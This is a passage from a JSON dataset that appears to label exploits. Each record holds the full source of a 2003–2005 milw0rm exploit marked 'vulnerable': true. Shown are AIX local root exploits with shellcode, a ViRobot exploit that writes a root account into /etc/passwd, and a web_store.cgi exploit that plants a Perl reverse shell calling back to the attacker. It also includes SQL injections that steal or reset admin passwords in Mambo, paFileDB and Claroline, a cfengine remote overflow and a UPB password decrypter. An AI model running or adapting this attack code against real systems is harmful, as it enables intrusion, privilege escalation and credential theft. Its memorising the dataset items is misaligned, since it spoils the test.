buffer_size);\n\n\n\n        address = ADDRESS;\n\n\n\n        if (DEBUG) printf(\"Going for address @ 0x%lx\\n\", address);\n\n\n\n        if (DEBUG) printf(\"Adding return address to buffer...\");\n\n        ret_addressp = (unsigned long *)(address_buffer+3);\n\n        for ( count = 0; count < buffer_size; count += 4) {\n\n                *(ret_addressp++) = address;\n\n        }\n\n        if (DEBUG) printf(\"size %d...\\n\", count);\n\n\n\n        address_buffer[buffer_size - 1] = '\\0';\n\n\n\n        return( 0 );\n\n}\n\n\n\nint main()\n\n{\n\n    char *buffer, *egg;\n\n    char *args[3], *envs[2];\n\n\n\n    buffer = (char *)malloc(BUFFERSIZE);\n\n    egg = (char *)malloc(EGGSIZE);\n\n\n\n    cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);\n\n\n\n    args[0] = \"/usr/sbin/ipl_varyon\";\n\n    args[1] = \"-d\";\n\n    args[2] = buffer;\n\n    args[3] = NULL;\n\n\n\n    envs[0] = egg;\n\n    envs[1] = NULL;\n\n\n\n    execve( \"/usr/sbin/ipl_varyon\", args, envs );\n\n\n\n    return( 0 );\n\n}\n\n\n\n// milw0rm.com [2005-06-14]",
255        "vulnerable": true
256    },
257    {
258        "exploit_id": 1046,
259        "content": "/*\n\n *\n\n *    IBM AIX paginit root exploit\n\n *\n\n *    I just wanted to play with PowerPC (Tested on 5.2)\n\n *\n\n *    intropy (intropy <at> caughq.org)\n\n *\n\n */\n\n\n\n#include <stdio.h>\n\n#include <unistd.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n\n\n#define DEBUG 1\n\n#define BUFFERSIZE 8000\n\n#define EGGSIZE 4003\n\n\n\n#define NOP 0x60\n\n#define ADDRESS 0x2ff22fff-EGGSIZE\n\n\n\n/* lsd */\n\nchar shellcode_binsh[] =\n\n\"\\x7c\\xa5\\x2a\\x79\"     /* xor.    r5,r5,r5             */\n\n\"\\x40\\x82\\xff\\xfd\"     /* bnel    <shellcode>          */\n\n\"\\x7f\\xe8\\x02\\xa6\"     /* mflr    r31                  */\n\n\"\\x3b\\xff\\x01\\x20\"     /* cal     r31,0x120(r31)       */\n\n\"\\x38\\x7f\\xff\\x08\"     /* cal     r3,-248(r31)         */\n\n\"\\x38\\x9f\\xff\\x10\"     /* cal     r4,-240(r31)         */\n\n\"\\x90\\x7f\\xff\\x10\"     /* st      r3,-240(r31)         */\n\n\"\\x90\\xbf\\xff\\x14\"     /* st      r5,-236(r31)         */\n\n\"\\x88\\x5f\\xff\\x0f\"     /* lbz     r2,-241(r31)         */\n\n\"\\x98\\xbf\\xff\\x0f\"     /* stb     r5,-241(r31)         */\n\n\"\\x4c\\xc6\\x33\\x42\"     /* crorc   cr6,cr6,cr6          */\n\n\"\\x44\\xff\\xff\\x02\"     /* svca                         */\n\n\"/bin/sh\"\n\n\"\\x05\";\n\n\n\nunsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {\n\n        int count, env_size = strlen(payload) + environment_size + 4 + 1;\n\n        unsigned long address, *ret_addressp;\n\n        \n\n        if (DEBUG) printf(\"Adding nops to environment buffer...\");\n\n        for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {\n\n            *(env_buffer++) = NOP;\n\n        }\n\n        if (DEBUG) printf(\"size %d...\\n\", count);\n\n        if (DEBUG) printf(\"Adding payload to environment buffer...\");\n\n        for ( count = 0; count < strlen(payload); count++ ) {\n\n            *(env_buffer++) = payload[count];\n\n        }\n\n        if (DEBUG) printf(\"size %d...\\n\", count);\n\n\n\n        env_buffer[env_size - 1] = '\\0';\n\n\n\n        memcpy(env_buffer, \"CAU=\", 4);\n\n\n\n\tmemset(address_buffer, 'A', buffer_size);\n\n\n\n        address = ADDRESS;\n\n\n\n        if (DEBUG) printf(\"Going for address @ 0x%lx\\n\", address);\n\n\n\n        if (DEBUG) printf(\"Adding return address to buffer...\");\n\n        ret_addressp = (unsigned long *)(address_buffer+2);\n\n        for ( count = 0; count < buffer_size; count += 4) {\n\n                *(ret_addressp++) = address;\n\n        }\n\n        if (DEBUG) printf(\"size %d...\\n\", count);\n\n\n\n        address_buffer[buffer_size - 1] = '\\0';\n\n\n\n        return( 0 );\n\n}\n\n\n\nint main()\n\n{\n\n    char *buffer, *egg;\n\n    char *args[3], *envs[2];\n\n\n\n    buffer = (char *)malloc(BUFFERSIZE);\n\n    egg = (char *)malloc(EGGSIZE);\n\n\n\n    cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);\n\n\n\n    args[0] = \"/usr/bin/paginit\";\n\n    args[1] = buffer;\n\n    args[2] = NULL;\n\n\n\n    envs[0] = egg;\n\n    envs[1] = NULL;\n\n\n\n    execve( \"/usr/bin/paginit\", args, envs );\n\n\n\n    return( 0 );\n\n}\n\n\n\n// milw0rm.com [2005-06-14]",
260        "vulnerable": true
261    },
262    {
263        "exploit_id": 1047,
264        "content": "#!/usr/bin/perl\n\n# ViRobot 2.0 remote cookie exploit - ala addschup\n\n# copyright Kevin Finisterre kf_lists[at]digitalmunition[dot]com\n\n#\n\n# jdam:/home/kfinisterre# ls -al /var/spool/cron/root\n\n# ls: /var/spool/cron/root: No such file or directory\n\n# jdam:/home/kfinisterre# ls -al /var/spool/cron/root\n\n# -rw-r--r--  1 root staff 104 2005-01-23 14:43 /var/spool/cron/root\n\n#\n\n# We control the 6th paramater passed to an fprintf call.\n\n#\n\n# 0x804a740 <_IO_stdin_used+572>:  \"%s %s %s %s %s %s/%s/vrupdate -s > /dev/null 2>&1\\n\"\n\n#\n\n# * * * * * /bin/echo r00t::0:0:root:/root:/bin/bash >> /etc/passwd &/ViRobot/vrupdate -s > /dev/null 2>&1\n\n\n\n\n\nuse IO::Socket;\n\n$hostName = $ARGV[0];\n\n\n\n$sock = IO::Socket::INET->new (\n\n               Proto => \"tcp\",\n\n               PeerAddr => $hostName,\n\n               PeerPort => 8080,\n\n               Type => SOCK_STREAM\n\n);\n\n\n\nif (! $sock)\n\n{\n\n       print \"[*] Error, could not connect to the remote host: $!\\n\";\n\n       exit (0);\n\n}\n\n\n\n$target = \"/cgi-bin/addschup\";\n\n$crondata = \"/bin/echo r00t::0:0:root:/root:/bin/bash >> /etc/passwd &\";\n\n$postbody = \"POST $target HTTP/1.1\\n\" .\n\n\"Host: localhost:8080\\n\" .\n\n\"User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.3) Gecko/20041007 Debian/1.7.3-5\\n\" .\n\n\"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\\n\" .\n\n\"Accept-Encoding: gzip,deflate\\n\" .\n\n\"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\\n\" .\n\n\"Keep-Alive: 300\\n\" .\n\n\"Connection: keep-alive\\n\" .\n\n\"Content-type: application/x-www-form-urlencoded\\n\" .\n\n\"Content-length: 1\\n\" .\n\n\"Cookie: ViRobot_ID=\" . \"A\" x 32 . \"$crondata\\n\";\n\n\n\nprint $sock $postbody;\n\nclose ($sock);\n\nexit (0);\n\n\n\n# milw0rm.com [2005-06-14]",
265        "vulnerable": true
266    },
267    {
268        "exploit_id": 1048,
269        "content": "#!/usr/bin/perl -w\n\n#\n\n#********************************************************************************************\n\n#               Remote Command Execution Vulnerability In Web_store.cgi                     *\n\n#                                                                                           *\n\n#                              [SegmentationFault Group]                                    *\n\n#                                                                                           *\n\n#                                                                                           *\n\n#             Greetz to  :  Xsupr3mo -  failed   - Status-x -  Stealh - P3S4D3L0            *\n\n#             Greetz to  :  berhooz  -   nima  - ehsan   - Unknown  OutLaw  eutanasia       *\n\n#                                      www.ashiyane.com                                     *\n\n#                                                                                           *\n\n#********************************************************************************************\n\n#ok setp by setp to work :                      *                                           *\n\n#[*] start exploit                              *   If connect back shell not found: maybe :*\n\n#[*] run in your system: nc -l -vv -p 2975      *   you do not have perm to write in /tmp   *\n\n#[*] starting connect back on 127.0.0.1 :2975   *            Shell not vulnerable           *\n\n#[*] DONE!                                      *   test and put in /$path/hints.pl?|cd /tmp*\n\n#[*] Look netcat windows                        *     other path that u know dont have perm *\n\n#                                               *                                           *\n\n#********************************************************************************************\n\n#############################################################################################\n\nuse IO::Socket;\n\n\n\nprint \"*****************************************************************\\n\";\n\nprint \"\\tRemote Command Execution Vulnerability in web_store.cgi\\n  \";\n\nprint \"\\t\\t-=[  SegmentationFault Group  ]=-\\n\";      \n\nprint \"\\t\\tcode writen    by sun-os [ActionSpider]\\n\\n\";  \n\nprint \"\\tGerttz to : Xsupr3mo -  failed   - Status-x -  Stealh\";\n\nprint \"\\n\\tand : Behrooz - nima - ehsan www.ashiyane.com\\n\";\n\nprint \"*****************************************************************\\n\\n\";\n\n\n\n\n\nprint \"enter hostname or ip : \\n\";\n\nchomp($server=<STDIN>);\n\n\n\nprint \"port: (default: 80)\\n\";\n\nchomp($port=<STDIN>);\n\n$port=80 if ($port =~/\\D/ );\n\n$port=80 if ($port eq \"\" );\n\n\n\nprint \"path: (???/web_store.cgi?)\\n\";\n\nchomp($path=<STDIN>);\n\n\n\nprint \"your ip (for reverse connect): \\n\";\n\nchomp($ip=<STDIN>);\n\n\n\nprint \"your port (for reverse connect): \\n\";\n\nchomp($reverse=<STDIN>);\n\n\n\nprint \"ok Remote Command Execution now Start\";\n\nprint \"|+| try to exploiting...\\n\";\n\n\n\n$string=\"/$path/web_store.cgi?page=.html|cd /tmp;echo \".q{use Socket;$execute= 'echo \"`uname -a`\";echo \"`id`\";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die(\"Error: $!\\n\");$paddr=sockaddr_in($port, $iaddr) || die(\"Error: $!\\n\");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!\\n\");connect(SOCKET, $paddr) || die(\"Error: $!\\n\");open(STDIN, \">&SOCKET\");open(STDOUT, \">&SOCKET\");open(STDERR, \">&SOCKET\");system($execute);close(STDIN)}.\" >>dc.pl;perl dc.pl $ip $reverse|\";\n\n\n\nprint \"|+| OK! \\n\";\n\nprint \"|+| NOW, run in your system: nc -l -vv -p $reverse\\n\";\n\nprint \"|+| starting connect back on $ip :$reverse\\n\";\n\nprint \"|+| DONE!\\n\";\n\nprint \"|+| Look netcat windows\\n\\n\";\n\n$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp)\n\nor die;\n\n\n\nprint $socket \"POST $path HTTP/1.1\\n\";\n\nprint $socket \"Host: $server\\n\";\n\nprint $socket \"Accept: */*\\n\";\n\nprint $socket \"User-Agent: blackbox\\n\";\n\nprint $socket \"Pragma: no-cache\\n\";\n\nprint $socket \"Cache-Control: no-cache\\n\";\n\nprint $socket \"Connection: close\\n\\n\";\n\n\n\nprint \"have nice shell...\";\n\n\n\n# milw0rm.com [2005-06-15]",
270        "vulnerable": true
271    },
272    {
273        "exploit_id": 1049,
274        "content": "#!/usr/bin/php -q\n\nMambo 4.5.2.1 + mysql 4.1 > fetch password hash by pokleyzz <pokleyzz at scan-associates.net>\n\n\n\n<?php\n\n/*\n\nMambo 4.5.2.1 + mysql 4.1 > fetch password hash by pokleyzz <pokleyzz at scan-associates.net>\n\n*content rating using sub query to select from mos_users\n\n\n\nRequirement:\n\n\n\n\tPHP 4.x with curl extension\n\n\n\nDescription:\n\n\n\nThe problem occur because $user_rating variable is not properly sanitize when for use in SQL query\n\nfor UPDATE statement. \n\n\n\n>From content.php (components\\com_content\\content.php)\n\n-----\n\nfunction recordVote ( $url, $user_rating, $cid, $database ){\n\n\t$cid = intval( $cid );\n\n  \n\n\tif ( ( $user_rating >= 1 ) and ( $user_rating <= 5 ) ) { <--- 1st Checkpoint\n\n\t\t$currip = getenv( 'REMOTE_ADDR' );\n\n\n\n\t\t$query = \"SELECT * FROM #__content_rating WHERE content_id = $cid\";\n\n\t\t$database->setQuery( $query );\n\n\t\t$votesdb = NULL;\n\n\t\t\n\n\t\tif ( !( $database->loadObject( $votesdb ) ) ) {\n\n\t\t\t$query = \"INSERT INTO #__content_rating ( content_id, lastip, rating_sum, rating_count )\"\n\n\t\t\t. \"\\n VALUES ( '$cid', '$currip', '$user_rating', '1' )\";\n\n\t\t\t$database->setQuery( $query );\n\n\t\t\t$database->query() or die( $database->stderr() );;\n\n\t\t} else {\n\n\t\t\tif ($currip <> ($votesdb->lastip)) { <-- 2nd Checkpoint\n\n\t\t\t\t\n\n\t\t\t\t$query = \"UPDATE #__content_rating\"\n\n\t\t\t\t. \"\\n SET rating_count = rating_count + 1,\"\n\n\t\t\t\t. \"\\n rating_sum = rating_sum + $user_rating,\" <--- PROBLEM\n\n\t\t\t\t. \"\\n lastip = '$currip'\"\n\n\t\t\t\t. \"\\n WHERE content_id = \". $cid\n\n\t\t\t\t;\n\n\t\t\t\t$database->setQuery( $query );\n\n\t\t\t\t$database->query() or die( $database->stderr() );\n\n\t\t\t} else {\n\n\t\t\t\tmosRedirect ( $url, _ALREADY_VOTE );\n\n\t\t\t}\n\n\t\t}\n\n\t\tmosRedirect ( $url, _THANKS );\n\n\t}\n\n}\n\n-----\n\nUser may escape 1st checkpoint by passing (1-5)(string) value to $user_rating .In PHP beginning\n\nnumber in string will be use when comparing number with string.\n\n\n\nThe 2nd checkpoint will check previous user's ip rated the content. Update statement will only \n\nexecute when previous ip is different from current ip. This proof of concept will use cgi proxy from \n\nhttp://projectbypass.com to make it possible.\n\n\n\nIn mySQL 4.1 and above it is possible to use \"sub select\" in any SQL statement. We will using \n\n\"blind fishing\" with sub select to fetch password hash (md5) for supplied user id. \n\n\n\nExploiting step:\n\n\n\n1) rate from different ip\n\n2) check time for standard page loading\n\n3) check time for page loading when benchmark executed.\n\n\t\t* If error occur mysql version is < 4.1 (no support for sub select)\n\n4) double the benchmark value. Blind fishing will use this value to do the query.\n\n5) blind fishing with sub select.\n\n\n\nSpecial thanks:\n\n\n\nal3ndaleeb at hotmail.com\n\n\n\n*/\n\n\n\nif (!(function_exists('curl_init'))) {\n\n\techo \"cURL extension required\\n\";\n\n\texit;\n\n}\n\n\n\nini_set(\"max_execution_time\",\"999999\");\n\n \n\n$benchcount = 150000;\n\n$aid= 62;\n\n$cid = 2;\n\n$charmap = array (48,49,50,51,52,53,54,55,56,57,\n\n\t\t  97,98,99,100,101,102,\n\n\t\t  103,104,105,\n\n\t\t  106,107,108,109,110,111,112,113,\n\n\t\t  114,115,116,117,118,119,120,121,122\n\n\t\t  );\n\n\t\t  \n\nif($argv[1]){\t\n\n\t$url = $argv[1];\n\n\tif ($argv[2])\n\n\t\t$aid = $argv[2];\n\n\tif ($argv[3])\n\n\t\t$benchcount = $argv[3];\n\n\tif ($argv[4])\n\n\t\t$proxy = $argv[4]; \n\n}\n\nelse {\n\n\techo \"Usage: \".$argv[0].\" <URL> [userid] [benchmarkcount] [proxy]\\n\\n\";\n\n\techo \"\\tURL\\t URL to mambo site (ex: http://127.0.0.1)\\n\";\n\n\techo \"\\taid\\t userid to get  (default: 62 (admin))\\n\";\n\n\techo \"\\tbenchmarkcount\\t benchmark count  (default: 150000)\\n\";\n\n\techo \"\\tproxy\\t optional proxy url  (ex: http://10.10.10.10:8080)\\n\"; \n\n\texit;\n\n}\n\n\n\n\n\n\n\n// rate from different ip (using http://projectbypass.com)\n\n\n\n$projectbypass = \"http://projectbypass.com/nph-proxy3.cgi/010110A/\";\n\n$ch = curl_init();\n\ncurl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace(\"://\",\"/\",$url).\"/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1\");\n\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER,1);\n\n$res = curl_exec($ch);\n\ncurl_close ($ch);\n\n\n\n// standard page loading time\n\n$start = time();\n\n$ch = curl_init();\n\nif ($proxy){\n\n\tcurl_setopt($ch, CURLOPT_PROXY,$proxy); \n\n}\n\ncurl_setopt($ch, CURLOPT_URL,$url);\n\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER,1);\n\n$res  = curl_exec($ch);\n\ncurl_close ($ch);\n\n$stop = time();\n\n$sloadtime = floatval($stop - $start);\n\necho \"standard page loading =\".$sloadtime.\"\\n\"; \n\n\n\n// benchmark page loading time\n\n$start = time();\n\n$ch = curl_init();\n\nif ($proxy){\n\n\tcurl_setopt($ch, CURLOPT_PROXY,$proxy); \n\n}\n\ncurl_setopt($ch, CURLOPT_URL,$url.\"/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($benchcount,md5(1)),1))+where+content_id=$cid/*\");\n\ncurl_setopt($ch, CURLOPT_RETURNTRANSFER,1);\n\n$res = curl_exec($ch);\n\ncurl_close ($ch);\n\n$stop = time();\n\n$bloadtime = floatval($stop - $start);\n\necho \"bencmark page loading =\".$bloadtime.\"\\n\"; \n\n\n\n// check if SQL query failed\n\nif (ereg(\"DB function failed\",$res)){\n\n\techo \"[x] mysql < 4.1 detected - not exploitable\\n\";\n\n\texit();\n\n}\n\n\n\nif ($bloadtime <= $sloadtime + 2){\n\n\techo \"[x] increase your benchmark count\\n\";\n\n\texit();\n\n}\n\n\n\necho \"Take your time for Teh Tarik... please wait ...\\n\\n\";\n\necho \"Result:\\n\";\n\necho \"\\tUserid = $aid\\n\";\n\necho \"\\tPassword Hash = \";\n\n\n\n// starting fetch password\n\n\n\n$benchcount = $benchcount*2;\n\n\t\t\n\nfor($i= 1;$i< 33;$i++){ \n\n\tforeach ($charmap as $char){\n\n\t\t$start = time();\n\n\t\techo chr($char);\n\n\t\t$ch = curl_init();\n\n\t\tif ($proxy){\n\n\t\t\tcurl_setopt($ch, CURLOPT_PROXY,$proxy); \n\n\t\t}\n\n\t\tcurl_setopt($ch, CURLOPT_URL,$url.\"/index.php?option=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+and+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+content_id=$cid/*\");\n\n\t\tcurl_setopt($ch, CURLOPT_RETURNTRANSFER,1);\n\n\t\t$res=curl_exec ($ch);\n\n\t\tcurl_close ($ch);\n\n\t\t$stop = time();\n\n\t\t$xloadtime = floatval($stop - $start);\n\n\t\tif (floatval($xloadtime) > $bloadtime){\n\n\t\t\t$hash .= chr($char);\n\n\t\t\tbreak 1;\n\n\t\t}\n\n\t\telse {\n\n\t\t\techo chr(8);\n\n\t\t}\n\n\t\t\n\n\t\tif ($char == 103){\n\n\t\t\techo \"\\n\\n\\tNot Vulnerable or Something wrong occur ...\\n\";\n\n\t\t\texit;\n\n\t\t}\n\n\t\t\n\n\t}\n\n}\n\necho \"\\n\";\n\n\n\n?>\n\n\n\n// milw0rm.com [2005-06-15]",
275        "vulnerable": true
276    },
277    {
278        "exploit_id": 105,
279        "content": "#!/usr/bin/perl -s\n\n# kokaninATdtors.net / cfengine2-2.0.3 from freebsd ports 26/sep/2003.\n\n# forking portbind shellcode port=0xb0ef(45295) by eSDee\n\n# bug discovered by nick cleaton, tested on FreeBSD 4.8-RELEASE\n\n\n\nuse IO::Socket;\n\nif(!$ARGV[1])\n\n{ print \"usage: ./DSR-cfengine.pl <host> <port> (default cfengine is 5308)\\n\"; exit(-1); }\n\n\n\n$host = $ARGV[0];\n\n$port = $ARGV[1];\n\n$nop = \"\\x90\";\n\n$ret = pack(\"l\",0xbfafe3dc);\n\n$shellcode = \n\n\"\\x31\\xc0\\x31\\xdb\\x53\\xb3\\x06\\x53\\xb3\\x01\\x53\\xb3\\x02\\x53\\x54\\xb0\".\n\n\"\\x61\\xcd\\x80\\x89\\xc7\\x31\\xc0\\x50\\x50\\x50\\x66\\x68\\xb0\\xef\\xb7\\x02\".\n\n\"\\x66\\x53\\x89\\xe1\\x31\\xdb\\xb3\\x10\\x53\\x51\\x57\\x50\\xb0\\x68\\xcd\\x80\".\n\n\"\\x31\\xdb\\x39\\xc3\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x50\\x57\".\n\n\"\\x50\\xb0\\x6a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x50\\x89\\xe1\\xb3\\x01\\x53\\x89\".\n\n\"\\xe2\\x50\\x51\\x52\\xb3\\x14\\x53\\x50\\xb0\\x2e\\xcd\\x80\\x31\\xc0\\x50\\x50\".\n\n\"\\x57\\x50\\xb0\\x1e\\xcd\\x80\\x89\\xc6\\x31\\xc0\\x31\\xdb\\xb0\\x02\\xcd\\x80\".\n\n\"\\x39\\xc3\\x75\\x44\\x31\\xc0\\x57\\x50\\xb0\\x06\\xcd\\x80\\x31\\xc0\\x50\\x56\".\n\n\"\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x31\\xdb\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\".\n\n\"\\x80\\x31\\xc0\\x43\\x53\\x56\\x50\\xb0\\x5a\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\".\n\n\"\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x54\\x53\\x50\\xb0\\x3b\".\n\n\"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\\x31\\xc0\\x56\\x50\\xb0\\x06\\xcd\\x80\".\n\n\"\\xeb\\x9a\";\n\n\n\n\n\n$buf = $nop x 2222 . $shellcode . $ret x 500;\n\n\n\n$socket = new IO::Socket::INET ( \n\nProto  => \"tcp\",\n\nPeerAddr => $host,\n\nPeerPort => $port, \n\n);\n\n\n\ndie \"unable to connect to $host:$port ($!)\\n\" unless $socket;\n\n\n\nsleep(1); #you might have to adjust this on slow connections\n\nprint $socket $buf;\n\n\n\nclose($socket);\n\n\n\n\n\n# milw0rm.com [2003-09-27]",
280        "vulnerable": true
281    },
282    {
283        "exploit_id": 1050,
284        "content": "#!/usr/bin/perl\n\n######################################################################################\n\n#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           #\n\n######################################################################################\n\n#  EXPLOIT FOR:   PHP Arena paFileDB 1.1.3 And 0lder                                 #\n\n#                                                                                    #\n\n#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v)                               #\n\n#Email: Alpha_Programmer@LinuxMail.ORG                                               #\n\n#                                                                                    #\n\n#                                                                                    #\n\n# + Discovered By: GulfTech                                                          #\n\n# + Advisory: https://www.securityfocus.com/bid/13967                                 #\n\n#Vulnerable:   PHP Arena paFileDB 1.1.3 and Older                                    #\n\n######################################################################################\n\n# GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  Dr_CephaleX  -- Str0ke          #\n\n#And Iranian Security & Hacking Groups:                                              #\n\n#                                                                                    #\n\n#      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  Emperor           #\n\n######################################################################################\n\n\n\nuse IO::Socket;\n\nif (@ARGV < 2)\n\n{\n\n  print \"\\n====================================================\\n\";\n\n  print \" \\n       PHPArena Exploit By Alpha Programmer\\n\\n\";\n\n  print \"       Trap-Set Underground Hacking Team      \\n\\n\";\n\n  print \"           Usage: <T4rg3t> <DIR>\\n\\n\";\n\n  print \"====================================================\\n\\n\";\n\n  print \"Examples:\\n\\n\";\n\n  print \"    xpl.pl www.Site.com / \\n\";\n\n  exit();\n\n}\n\n\n\nmy $host = $ARGV[0];\n\nmy $dir = $ARGV[1];\n\nmy $remote = IO::Socket::INET->new ( Proto => \"tcp\", PeerAddr => $host,\n\nPeerPort => \"80\" );\n\nunless ($remote) { die \"C4nn0t C0nn3ct to $host\" }\n\nprint \"\\n\\n[+] C0nn3cted\\n\";\n\n$http = \"pafiledb.php?action=team&tm=file&file=edit&id=1&edit=do&query=UPDATE%20pafiledb_admin%20SET%20admin_password%20=%20c15c493548d09ffd03c9d41d8bbbfeef%281337%28%20WHERE%201/*\\n\";\n\n$http .= \"Host: $host\\n\\r\\n\\r\";\n\nprint \"[+] Injecting SQL Commands ...\\n\";\n\nsleep(1);\n\nprint \"[+] Changing Admin's Password ...\\n\";\n\nprint $remote $http;\n\nsleep(1);\n\nwhile (<$remote>)\n\n{\n\n}\n\nprint \"[+] Now , Login With This Password :\\n\";\n\nprint \"Password : trapset\\n\\n\";\n\nprint \"Enjoy ;) \\n\\n\";\n\n\n\n# milw0rm.com [2005-06-15]",
285        "vulnerable": true
286    },
287    {
288        "exploit_id": 1051,
289        "content": "#!/usr/bin/perl\n\n#\n\n# Passwords Decrypter for UPB <= 1.9.6\n\n# Related advisory: http://www.securityfocus.com/archive/1/402461/30/0/threaded\n\n# Discovered and Coded by Alberto Trivero\n\n\n\n# Password file is located at: http://www.example.com/upb/db/users.dat   /str0ke\n\n\n\n\n\nuse Getopt::Std;\n\nuse LWP::Simple;\n\ngetopt('hfu');\n\n\n\nprint \"\\n\\t========================================\\n\";\n\nprint \"\\t= Passwords Decrypter for UPB <= 1.9.6 =\\n\";\n\nprint \"\\t=          by Alberto Trivero          =\\n\";\n\nprint \"\\t========================================\\n\\n\";\n\n\n\nif(!$opt_h or !($opt_f or $opt_u) or ($opt_f && $opt_u)) {\n\n   print \"Usage:\\nperl $0 -h [full_target_path] [-f [output_file_name] OR -u [username]]\\n\\n\";\n\n   print \"Examples:\\nperl $0 -h http://www.example.com/upb/ -f results.txt\\n\";\n\n   print \"perl $0 -h http://www.example.com/upb/ -u Alby\\n\";\n\n   exit(0);\n\n}\n\n\n\n$key=\"wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtneltaomowpkfvmmogbayankrnrhmbduzfmpctxiidweripxwglmwrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupkzvqnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcuiqggccl\";\n\n$page=get($opt_h.\"db/users.dat\") || die \"[-] Unable to retrieve: $!\";\n\nprint \"[+] Connected to: $opt_h\\n\";\n\n@page=split(/\\n/,$page);\n\n\n\nif($opt_f) {\n\n   open(RESULTS,\"+>$opt_f\") || die \"[-] Unable to open $opt_f: $!\";\n\n   print RESULTS \"Results for $opt_h\\n\",\"=\"x40,\"\\n\\n\";\n\n   for($in=0;$in<@page;$in++) {\n\n      $page[$in]=~m/^(.*?)<~>/ && print RESULTS \"Username: $1\\n\";\n\n      $page[$in]=~m/^$1<~>(.*?)<~>/ && print RESULTS \"Crypted Password: $1\\n\";\n\n      &decrypt;\n\n      print RESULTS \"Decrypted Password: $crypt\\n\\n\";\n\n      $crypt=\"\";\n\n   }\n\n   close(RESULTS);\n\n   print \"[+] Results printed correct in: $opt_f\\n\";\n\n}\n\n\n\nif($opt_u) {\n\n   for($in=0;$in<@page;$in++) {\n\n      if($page[$in]=~m/^$opt_u<~>(.*?)<~>/) {\n\n        print \"[+] Username: $opt_u\\n\";\n\n        print \"[+] Crypted Password: $1\\n\";\n\n         &decrypt;\n\n         print \"[+] Decrypted Password: $crypt\\n\";\n\n         exit(0);\n\n      }\n\n   }\n\n   print \"[-] Username '$opt_u' doesn't exist\\n\";\n\n}\n\n\n\nsub decrypt {\n\n   for($i=0;$i<length($1);$i++) {\n\n      $i_key=ord(substr($key, $i, 1));\n\n      $i_text=ord(substr($1, $i, 1));\n\n      $n_key=ord(substr($key, $i+1, 1));\n\n      $i_crypt=$i_text + $n_key;\n\n      $i_crypt-=$i_key;\n\n      $crypt.=chr($i_crypt);\n\n   }\n\n}\n\n\n\n# milw0rm.com [2005-06-16]",
290        "vulnerable": true
291    },
292    {
293        "exploit_id": 1052,
294        "content": "<?php\n\n#############################################################################\n\n#    T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m\n\n#############################################################################\n\n# Vulnerable:   Claroline E-Learning Application\n\n#\n\n# Exploit By :  MH_p0rtal\n\n#\n\n# Discovered By: Sieg Fried\n\n#\n\n#############################################################################\n\n#  Gr33tz To ==>   Alpha_programmer , Oil_karchack , Dr_CephaleX , Str0ke\n\n#\n\n#  And Iranian Hacking & Security Teams :\n\n#  IHS TeaM , alphaST , Shabgard Security Team  , Emperor Hacking Team  ,\n\n#  Crouz Security Team  & Simorgh-ev Security Team\n\n#############################################################################\n\n# ___________Config :\n\n# please replace your address :\n\n$url = \"http:///www.example.com\";\n\n# Please replace your name file  ( userInfo.php Or  exercises_details.php )\n\n$file1 = \"userInfo.php\";\n\n# please replace your dir address :\n\n$dirs = \"/dir/to/claroline/user/\";\n\n# __________End Config\n\n#############################################################################\n\nif ( $file1 == \"userInfo.php\" ) {\n\n$merg = $dirs.$file1;\n\n$fc = fsockopen(\"$url\", 80, $errno, $errstr, 30);\n\nif (!$fc) {\n\n\n\necho \"Can't Connect\\n\";\n\n} else {\n\n   $mh = \"GET $merg?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/*  HTTP/1.1\\r\\n\";\n\n   $mh .= \"Host: $url\\r\\n\";\n\n   $mh .= \"Connection: Close\\r\\n\\r\\n\";\n\n\n\n  fwrite($fc, $mh);\n\n  while (!feof($fc)) {\n\n  echo fgets($fc, 1024);\n\n  }\n\n   fclose($fc);\n\n}\n\n}\n\n//-------------------------------------------------------------------------------------------\n\nif ( $file1 == \"exercises_details.php\" ) {\n\n$merg = $dirs.$file1;\n\n$fc = fsockopen(\"$url\", 80, $errno, $errstr, 30);\n\nif (!$fc) {\n\n\n\necho \"Can't Connect\\n\";\n\n} else {\n\n   $mh = \"GET $merg?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1--  HTTP/1.1\\r\\n\";\n\n   $mh 